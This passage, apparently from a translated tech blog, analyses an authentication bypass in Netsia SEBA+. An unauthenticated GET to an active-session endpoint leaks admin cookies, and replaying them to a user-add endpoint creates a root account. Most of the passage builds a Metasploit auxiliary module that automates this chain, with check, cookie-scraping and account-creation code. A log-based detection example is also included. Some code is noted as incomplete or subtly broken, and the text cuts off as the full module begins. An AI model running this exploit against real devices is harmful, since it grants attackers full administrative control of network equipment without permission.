2025-02-24 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)05/31 Report--
The editor would like to share an example analysis of the Netsia-SEBA authentication bypass vulnerability. Most people do not know much about it, so this article is shared for your reference; I hope you learn a lot from reading it. Let's get into it!
Vulnerability analysis
Unfortunately, because I don't have access to the product's source code, I can't describe the original cause of the vulnerability in detail.
In the application, the HTTP request behind the "Active Sessions" section, which is meant for the root/admin user, can be sent without any session (cookie) information. As a result, the session cookie values of the application's active users can be read from the response.
It is important to note that similar requests cannot be sent elsewhere in the application. In other words, a request without session information is accepted only here, in "Active Sessions".
By sending the request "GET /session/list/allActiveSession", we obtain the cookie value of an authorized user from the session information returned in the response.
At this point, we have a cookie value on hand, but the session is likely to end soon. So the best attack vector is to create a new user.
Therefore, we can add a new root user to the application by sending the required data in a "POST /authentication-server/user/add" request.
In the attack shown in the figure above, after obtaining the cookie value of a logged-in user, an unauthenticated attacker can create a new user with full privileges by placing this cookie value in the user-add request, as shown in the following figure:
As shown in the figure above, the HTTP response indicates that the requested user has been successfully added. Later, the attacker can easily use this user with full privileges to log in to the application and perform all other actions.
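The two behaviours described above (a session-list request served without any cookie, and a leaked session value replayed from a different client to the user-add endpoint) are exactly what a defender can look for in proxy or access logs. The following Ruby example is added here and is not code from the original article or from the Netsia SEBA+ product; it assumes a simplified, constructed log format of "client_ip method path status session_cookie_value" with "-" when no cookie was sent.

```ruby
# Added detection example (not from the original article or the product).
# Assumed log layout per line: "client_ip method path status session_value",
# where session_value is "-" when the request carried no session cookie.
SESSION_LIST = '/session/list/allActiveSession'
USER_ADD     = '/authentication-server/user/add'

# Constructed sample records, not real traffic. A legitimate admin (192.168.1.20)
# is active; 10.0.0.5 enumerates sessions without a cookie and then replays
# the leaked value a1b2c3 against the user-add endpoint.
SAMPLE_LOG = <<~LOG
  192.168.1.20 GET /dashboard 200 a1b2c3
  10.0.0.5 GET /session/list/allActiveSession 200 -
  10.0.0.5 POST /authentication-server/user/add 200 a1b2c3
  192.168.1.21 GET /session/list/allActiveSession 200 d4e5f6
  192.168.1.21 GET /dashboard 200 d4e5f6
LOG

def parse_line(line)
  ip, method, path, status, session = line.split
  { ip: ip, method: method, path: path, status: status.to_i, session: session }
end

# Returns an array of alert strings, one per suspicious record.
def detect(log_text)
  records = log_text.lines.map(&:strip).reject(&:empty?).map { |l| parse_line(l) }
  owner = {} # session value => client IP that was first seen using it
  alerts = []
  records.each do |r|
    # Rule 1: the session list answered 200 to a request with no session cookie.
    if r[:path] == SESSION_LIST && r[:session] == '-' && r[:status] == 200
      alerts << "unauthenticated session listing from #{r[:ip]}"
    end
    next if r[:session] == '-'
    owner[r[:session]] ||= r[:ip]
    # Rule 2: a session value reused from a different client than its first user.
    if owner[r[:session]] != r[:ip]
      alerts << "session #{r[:session]} of #{owner[r[:session]]} reused from " \
                "#{r[:ip]} on #{r[:method]} #{r[:path]}"
    end
  end
  alerts
end
```

Rule 2 fires on any cross-client reuse; in practice the hit on USER_ADD is the one to treat as a confirmed privilege-escalation attempt.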
Exploit development (MSF Auxiliary)
About the Auxiliary module
The Metasploit framework includes hundreds of auxiliary modules that perform scanning, fuzzing, vulnerability checking, sniffing, and so on. Although these modules will not give you a shell, they are very valuable in penetration testing. "show auxiliary" lists all auxiliary modules:
Exploit modules are usually written to execute commands on the target system, while MSF's Auxiliary modules suit a variety of common vulnerability types, such as obtaining information from the target host or using an existing vulnerability on the target host to create a new attack vector.
Therefore, we can use MSF's Auxiliary module to exploit this vulnerability.
```ruby
class MetasploitModule < Msf::Auxiliary
```
No payload is generated at this point, because we have not selected Msf::Exploit::Remote. Next, we register the username and password as module options. Rex::Text.rand_text_alphanumeric() is used here to generate a random password value, which is convenient during exploitation.
```ruby
register_options(
  [
    Opt::RPORT(443),
    OptString.new('USERNAME', [true, 'The username for your new account']),
    OptString.new('PASSWORD', [true, 'The password for your new account', Rex::Text.rand_text_alphanumeric(14)])
  ])
```
Next, request "/session/list/allActiveSession" and check the response. If the response contains "sessionId", an active session exists. If there is no "sessionId" but the response contains "SUCCESS", the application is vulnerable but has no active session.
```ruby
def check
  begin
    res = send_request_cgi(
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path, "session", "list", "allActiveSession")
    )
  rescue
    return Exploit::CheckCode::Unknown
  end
  if res.code == 200 and res.body.include? 'sessionId'
    return Exploit::CheckCode::Vulnerable
  elsif res.code == 200 and res.body.include? 'SUCCESS'
    print_status("Target is vulnerable! But active admin session was not found. Try again later.")
    return Exploit::CheckCode::Appears
  end
  return Exploit::CheckCode::Safe
end
```
The check method above is sufficient for this step, and we do not need Auxiliary to run any further unnecessary detection, because nothing else is worth doing if the target is not vulnerable.
```ruby
unless Exploit::CheckCode::Vulnerable == check
  fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
end
```
Next, we can start writing exploit code.
First, we need to know how many active sessions there are in the Netsia SEBA+ application. Because there can be multiple users active, some of them may not be authorized users, and we need to use the most privileged active users to attack. So I decided to create a separate counting method.
```ruby
# Count the occurrences of find_string in data using a zero-width lookahead.
def count_user(data, find_string)
  data.scan(/(?=#{find_string})/).count
end
```
We pass the HTTP response body as data and look for the string "sessionId". The number of "sessionId" occurrences in the returned response is the number of active users, and we will need to extract these session ID values later.
```ruby
res = send_request_cgi(
  'method' => 'GET',
  'uri'    => normalize_uri(target_uri.path, "session", "list", "allActiveSession")
)
sescount = count_user(res.body, '"name"')
print_good("Currently #{sescount} active sessions have been detected.")
```
The above section completes the first step; next, the sessionId values need to be extracted.
In the response, the value of sessionId is the part between `"sessionId":"` and `","action`. We can use the scan() function with a lazy capture group to pull it out.
```ruby
# The character class in the source reads [\s]*?, which matches only whitespace
# and could never capture a session ID; [\s\S]*? (any character, lazily) is
# assumed here to be the intended form.
cookies = res.body.scan(/sessionId":"([\s\S]*?)","action/)
```
In the above process, cookies[0] will hold the sessionId value of the first user and cookies[1] that of the second user, and so on, with the index increasing by 1 for each user.
Now, we will apply a very simple vector for development.
We will send a user creation request that contains all the active cookie values, and no matter which of these cookies is authorized, it will create a new user in the user database we want.
Here I chose to use a while loop. For example, if there are seven active users, this loop increments the index into the cookies array each time and sends a request for every possible cookie value.
```ruby
# The loop condition and the lines that build 'cookie' (from the current cookies
# entry) and 'json_data' (the new-user body) are cut off in the source; the
# condition "$i < sescount" is inferred from the text above.
while $i < sescount
  res = send_request_cgi({
    'method' => 'POST',
    'ctype'  => 'application/json',
    'uri'    => normalize_uri(target_uri.path, 'authentication-server', 'user', 'add'),
    'cookie' => cookie,
    'data'   => json_data
  })
end
```
A loop like the one above is sufficient for this vector. Finally, we need to check whether the request succeeded.
If the requested user was created, the module reports it and prints the newly created user's details.
```ruby
if res.code == 200 and res.body.include? '"SUCCESS"'
  print_good("Excellent! User #{datastore["USERNAME"]} was added successfully with root, admin and default privileges.")
  print_good("Username: #{datastore["USERNAME"]}")
  print_good("Password: #{datastore["PASSWORD"]}")
  break
end
```
Exploit practice
Now that the Auxiliary module is complete, let's put it all together:
```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Netsia SEBA+
```